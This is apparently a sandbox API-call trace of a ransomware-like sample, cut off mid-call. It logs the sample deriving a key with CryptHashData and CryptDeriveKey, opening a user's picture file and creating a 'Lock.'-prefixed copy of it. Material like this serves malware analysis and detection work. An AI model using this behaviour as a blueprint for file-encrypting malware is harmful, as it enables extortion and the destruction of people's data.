WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.817] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0208.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.818] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.818] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.818] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0208.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab410, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0208.818] CryptHashData (hHash=0x9e2078, pbData=0x2a71b98, dwDataLen=0x3, dwFlags=0x1) returned 1 [0208.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.818] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.818] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.818] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.819] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.819] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.819] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.819] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.819] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0208.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0208.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab140, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0208.819] CryptDeriveKey (in: hProv=0xa7c110, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1bf8) returned 1 [0208.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.819] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.819] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0208.819] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.819] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0208.819] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0208.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0208.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0208.820] CryptDestroyHash (hHash=0x9e2078) returned 1 [0208.820] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.820] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.820] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.820] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.820] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.820] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/6MclNK.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\6mclnk.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0208.821] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.821] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0208.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0208.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0208.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0208.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0208.821] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0208.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0208.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0208.821] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0208.821] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0208.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0208.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0208.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0208.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0208.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0208.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0208.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a739f8 [0208.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.822] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0208.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a739f8 | out: hHeap=0x2af0000) returned 1 [0208.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0208.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0208.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0208.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0208.822] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.6MclNK.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.6mclnk.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0208.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fa0 [0208.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0208.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0208.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0208.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0208.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0208.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0208.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0208.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0208.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0208.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0208.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0208.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0208.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0208.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0208.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e3020 [0208.828] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0208.828] ReadFile (in: hFile=0x510, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x7be6, lpOverlapped=0x0) returned 1 [0208.830] ReadFile (in: hFile=0x510, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0208.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0208.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0208.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7be6) returned 0x2a9a940 [0208.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e3020 | out: hHeap=0x2af0000) returned 1 [0208.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0208.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0208.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0208.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0208.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0208.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0208.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7be6) returned 0x2aae878 [0208.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a940 | out: hHeap=0x2af0000) returned 1 [0208.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0208.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0208.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0208.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0208.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7be6) returned 0x2a9a940 [0208.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0208.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a940 | out: hHeap=0x2af0000) returned 1 [0208.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0208.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0208.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0208.835] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0208.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0208.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0208.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0208.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0208.835] PeekMessageW (in: 